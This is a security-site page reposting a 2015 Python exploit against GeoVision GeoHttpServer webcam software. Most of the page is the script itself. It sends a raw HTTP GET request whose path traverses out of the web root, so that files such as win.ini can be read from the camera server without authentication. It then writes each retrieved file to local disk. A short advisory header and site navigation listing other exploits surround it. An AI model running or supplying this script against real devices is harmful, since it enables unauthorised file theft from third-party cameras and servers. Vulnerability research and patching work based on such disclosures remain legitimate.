首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit 来源：minin.viktor@gmail.com 作者：Minin 发布时间：2015-06-11   #!/usr/bin/python import os import sys import socket import binascii   ''' Title       : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit CVE-ID      : none Product     : GeoVision System      : GeoHttpServer Affected    : 8.3.3.0 (may be more) Impact      : Critical Remote      : Yes Website link: http://www.geovision.com.tw/ Reported    : 10/06/2015 Author      : Viktor Minin, minin.viktor@gmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- No authentication (login) is required to exploit this vulnerability. The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability. An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser. '''   #os.system("cls") os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit'); os.system('color 2');   socket.setdefaulttimeout = 0.50 os.environ['no_proxy'] = '127.0.0.1,localhost' CRLF = "\r\n"     def main():     print "#######################################################################"     print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"     print "# Usage: <ip> <port> <file>"     print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini"     print "#######################################################################"     exit()   try:     url     = sys.argv[1]     port    = int(sys.argv[2])     #files  = open(sys.argv[3],'r').read().split()     file    = sys.argv[3] except:     main()      def recvall(sock):     data = ""     part = None     while part != "":         part = sock.recv(4096)         data += part     return data   def request(url, port, pfile):     PATH = str(pfile)       HOST = url     PORT = port     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)     sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)     sock.connect((HOST, PORT))     sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))     data = recvall(sock)     temp = data.split("\r\n\r\n")     sock.shutdown(1)        sock.close()     return temp[1]   ret = request(url, port, file) hex = "".join("{:02x}".format(ord(c)) for c in ret) bin = binascii.unhexlify(hex) print ret file = open(file.replace('\\', '_'),"wb") file.write(bin) file.close()   #~EOF   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ProFTPD 1.3.5 Mod_Copy Command ·Libmimedir VCF Memory Corrupti ·Apexis IP CAM Username / Passw ·This POODLE Bites: Exploiting ·Microsoft Internet Explorer 11 ·OSSEC 2.8.1 Local Root Escalat ·Viber Remote Crash Proof Of Co ·D-Link DSP-W110 Command Execut ·Microsoft Windows HTA Crash Pr ·foobar2000 1.3.8 (.m3u) Local ·Beckhoff IPC Diagnositcs Authe ·OpenBSD 5.7 sys_execve() Denia   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved